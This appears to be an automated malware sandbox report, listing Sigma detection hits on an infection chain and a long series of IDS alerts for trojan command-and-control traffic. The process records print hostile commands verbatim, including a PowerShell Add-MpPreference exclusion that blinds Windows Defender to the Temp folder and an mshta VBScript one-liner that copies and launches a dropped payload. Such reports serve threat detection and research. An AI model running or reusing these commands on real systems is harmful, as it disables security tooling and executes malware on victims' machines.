                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", CommandLine: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7752, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", ProcessId: 7760, ProcessName: powershell.exe
                  Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: control .\R6f7sE.I, ParentImage: C:\Windows\SysWOW64\control.exe, ParentProcessId: 1196, ParentProcessName: control.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I, ProcessId: 7852, ProcessName: rundll32.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", CommandLine: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, ParentProcessId: 7700, ParentProcessName: setup_install.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", ProcessId: 7752, ProcessName: cmd.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU" , CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5448, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU" , ProcessId: 2316, ProcessName: cmd.exe
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), CommandLine: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: Mon17e1fac3fd3d84b.exe, ParentImage: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe, ParentProcessId: 7956, ParentProcessName: Mon17e1fac3fd3d84b.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), ProcessId: 5448, ProcessName: mshta.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", CommandLine: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7752, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", ProcessId: 7760, ProcessName: powershell.exe
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7596, ProcessName: svchost.exe
                  Timestamp:2024-08-21T10:57:16.929515+0200
                  SID:2803305
                  Severity:3
                  Source Port:59942
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:59:33.745707+0200
                  SID:2803305
                  Severity:3
                  Source Port:60050
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:41.398811+0200
                  SID:2803305
                  Severity:3
                  Source Port:60100
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:59:18.602448+0200
                  SID:2850107
                  Severity:1
                  Source Port:60036
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:18.602448+0200
                  SID:2850938
                  Severity:1
                  Source Port:60036
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:58:30.595516+0200
                  SID:2803305
                  Severity:3
                  Source Port:60004
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:11.667367+0200
                  SID:2850107
                  Severity:1
                  Source Port:60076
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:11.667367+0200
                  SID:2850938
                  Severity:1
                  Source Port:60076
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:26.633655+0200
                  SID:2850107
                  Severity:1
                  Source Port:60043
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:26.633655+0200
                  SID:2850938
                  Severity:1
                  Source Port:60043
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:57:33.894339+0200
                  SID:2803305
                  Severity:3
                  Source Port:59969
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:07.577839+0200
                  SID:2803305
                  Severity:3
                  Source Port:60075
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:01.948773+0200
                  SID:2803305
                  Severity:3
                  Source Port:60071
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:57:45.127471+0200
                  SID:2803305
                  Severity:3
                  Source Port:59975
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:41.569507+0200
                  SID:2850107
                  Severity:1
                  Source Port:60097
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:41.569507+0200
                  SID:2850938
                  Severity:1
                  Source Port:60097
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:24.456510+0200
                  SID:2803305
                  Severity:3
                  Source Port:60087
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:18.862793+0200
                  SID:2803305
                  Severity:3
                  Source Port:60083
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:32.305962+0200
                  SID:2850107
                  Severity:1
                  Source Port:60091
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:32.305962+0200
                  SID:2850938
                  Severity:1
                  Source Port:60091
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:57:16.527142+0200
                  SID:2803305
                  Severity:3
                  Source Port:59940
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:58:50.306446+0200
                  SID:2850107
                  Severity:1
                  Source Port:60015
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:58:50.306446+0200
                  SID:2850938
                  Severity:1
                  Source Port:60015
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:02.352307+0200
                  SID:2850107
                  Severity:1
                  Source Port:60024
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:02.352307+0200
                  SID:2850938
                  Severity:1
                  Source Port:60024
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:28.129049+0200
                  SID:2803305
                  Severity:3
                  Source Port:60046
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:57:52.783806+0200
                  SID:2850107
                  Severity:1
                  Source Port:59968
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:57:52.783806+0200
                  SID:2850938
                  Severity:1
                  Source Port:59968
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:57:03.226772+0200
                  SID:2850107
                  Severity:1
                  Source Port:60118
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:57:03.226772+0200
                  SID:2850938
                  Severity:1
                  Source Port:60118
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:58:07.797527+0200
                  SID:2803305
                  Severity:3
                  Source Port:59991
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:59:39.386329+0200
                  SID:2803305
                  Severity:3
                  Source Port:60054
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:57:50.318003+0200
                  SID:2039103
                  Severity:1
                  Source Port:59977
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:57:50.318003+0200
                  SID:2847712
                  Severity:1
                  Source Port:59977
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:57:50.318003+0200
                  SID:2850316
                  Severity:1
                  Source Port:59977
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:58:58.337526+0200
                  SID:2850107
                  Severity:1
                  Source Port:60022
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:58:58.337526+0200
                  SID:2850938
                  Severity:1
                  Source Port:60022
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:01:05.881179+0200
                  SID:2850107
                  Severity:1
                  Source Port:60115
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:01:05.881179+0200
                  SID:2850938
                  Severity:1
                  Source Port:60115
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:58:02.177324+0200
                  SID:2803305
                  Severity:3
                  Source Port:59988
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:57:39.501144+0200
                  SID:2803305
                  Severity:3
                  Source Port:59972
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:47.184475+0200
                  SID:2803305
                  Severity:3
                  Source Port:60104
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:58.477405+0200
                  SID:2803305
                  Severity:3
                  Source Port:60112
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:49.650539+0200
                  SID:2850107
                  Severity:1
                  Source Port:60103
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:49.650539+0200
                  SID:2850938
                  Severity:1
                  Source Port:60103
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:58:34.229229+0200
                  SID:2850107
                  Severity:1
                  Source Port:60002
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:58:34.229229+0200
                  SID:2850938
                  Severity:1
                  Source Port:60002
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:24.275254+0200
                  SID:2850107
                  Severity:1
                  Source Port:60085
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:24.275254+0200
                  SID:2850938
                  Severity:1
                  Source Port:60085
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:55.253881+0200
                  SID:2850107
                  Severity:1
                  Source Port:60063
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:55.253881+0200
                  SID:2850938
                  Severity:1
                  Source Port:60063
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:22.484880+0200
                  SID:2803305
                  Severity:3
                  Source Port:60041
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:58:42.262286+0200
                  SID:2850107
                  Severity:1
                  Source Port:60010
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:58:42.262286+0200
                  SID:2850938
                  Severity:1
                  Source Port:60010
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:57:56.540566+0200
                  SID:2803305
                  Severity:3
                  Source Port:59983
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:45.634104+0200
                  SID:2850107
                  Severity:1
                  Source Port:60101
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:45.634104+0200
                  SID:2850938
                  Severity:1
                  Source Port:60101
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:14.587628+0200
                  SID:2850107
                  Severity:1
                  Source Port:60033
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:14.587628+0200
                  SID:2850938
                  Severity:1
                  Source Port:60033
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:35.024805+0200
                  SID:2850107
                  Severity:1
                  Source Port:60048
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:35.024805+0200
                  SID:2850938
                  Severity:1
                  Source Port:60048
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:30.660918+0200
                  SID:2850107
                  Severity:1
                  Source Port:60045
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:30.660918+0200
                  SID:2850938
                  Severity:1
                  Source Port:60045
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:58:13.448105+0200
                  SID:2803305
                  Severity:3
                  Source Port:59994
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:59:59.336871+0200
                  SID:2850107
                  Severity:1
                  Source Port:60066
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:59.336871+0200
                  SID:2850938
                  Severity:1
                  Source Port:60066
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:53.666394+0200
                  SID:2850107
                  Severity:1
                  Source Port:60106
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:53.666394+0200
                  SID:2850938
                  Severity:1
                  Source Port:60106
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:58:14.158762+0200
                  SID:2850107
                  Severity:1
                  Source Port:59980
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:58:14.158762+0200
                  SID:2850938
                  Severity:1
                  Source Port:59980
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:57.690084+0200
                  SID:2850107
                  Severity:1
                  Source Port:60110
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:57.690084+0200
                  SID:2850938
                  Severity:1
                  Source Port:60110
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:43.196401+0200
                  SID:2850107
                  Severity:1
                  Source Port:60055
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:43.196401+0200
                  SID:2850938
                  Severity:1
                  Source Port:60055
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:57:22.594371+0200
                  SID:2803305
                  Severity:3
                  Source Port:59953
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:58:24.786762+0200
                  SID:2803305
                  Severity:3
                  Source Port:60000
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:01:01.853398+0200
                  SID:2850107
                  Severity:1
                  Source Port:60113
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:01:01.853398+0200
                  SID:2850938
                  Severity:1
                  Source Port:60113
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:58:46.290141+0200
                  SID:2850107
                  Severity:1
                  Source Port:60013
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:58:46.290141+0200
                  SID:2850938
                  Severity:1
                  Source Port:60013
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:47.213152+0200
                  SID:2850107
                  Severity:1
                  Source Port:60057
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:47.213152+0200
                  SID:2850938
                  Severity:1
                  Source Port:60057
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:57:50.895226+0200
                  SID:2803305
                  Severity:3
                  Source Port:59978
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:59:56.302056+0200
                  SID:2803305
                  Severity:3
                  Source Port:60067
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:59:06.398217+0200
                  SID:2850107
                  Severity:1
                  Source Port:60027
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:06.398217+0200
                  SID:2850938
                  Severity:1
                  Source Port:60027
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:37.305394+0200
                  SID:2850107
                  Severity:1
                  Source Port:60093
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:37.305394+0200
                  SID:2850938
                  Severity:1
                  Source Port:60093
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:19.697545+0200
                  SID:2850107
                  Severity:1
                  Source Port:60082
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:19.697545+0200
                  SID:2850938
                  Severity:1
                  Source Port:60082
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:07.649429+0200
                  SID:2850107
                  Severity:1
                  Source Port:60073
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:07.649429+0200
                  SID:2850938
                  Severity:1
                  Source Port:60073
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:03.490004+0200
                  SID:2850107
                  Severity:1
                  Source Port:60070
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:03.490004+0200
                  SID:2850938
                  Severity:1
                  Source Port:60070
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:58:26.213014+0200
                  SID:2850107
                  Severity:1
                  Source Port:59995
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:58:26.213014+0200
                  SID:2850938
                  Severity:1
                  Source Port:59995
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:22.618763+0200
                  SID:2850107
                  Severity:1
                  Source Port:60040
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:22.618763+0200
                  SID:2850938
                  Severity:1
                  Source Port:60040
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:39.132181+0200
                  SID:2850107
                  Severity:1
                  Source Port:60052
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:39.132181+0200
                  SID:2850938
                  Severity:1
                  Source Port:60052
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:10.430870+0200
                  SID:2850107
                  Severity:1
                  Source Port:60031
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:10.430870+0200
                  SID:2850938
                  Severity:1
                  Source Port:60031
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:15.696828+0200
                  SID:2850107
                  Severity:1
                  Source Port:60078
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:15.696828+0200
                  SID:2850938
                  Severity:1
                  Source Port:60078
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:35.757223+0200
                  SID:2803305
                  Severity:3
                  Source Port:60096
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:58:38.243341+0200
                  SID:2850107
                  Severity:1
                  Source Port:60006
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:58:38.243341+0200
                  SID:2850938
                  Severity:1
                  Source Port:60006
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:57:50.877231+0200
                  SID:2039103
                  Severity:1
                  Source Port:59977
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:57:50.877231+0200
                  SID:2847712
                  Severity:1
                  Source Port:59977
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:57:50.877231+0200
                  SID:2850316
                  Severity:1
                  Source Port:59977
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:50.692749+0200
                  SID:2803305
                  Severity:3
                  Source Port:60062
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
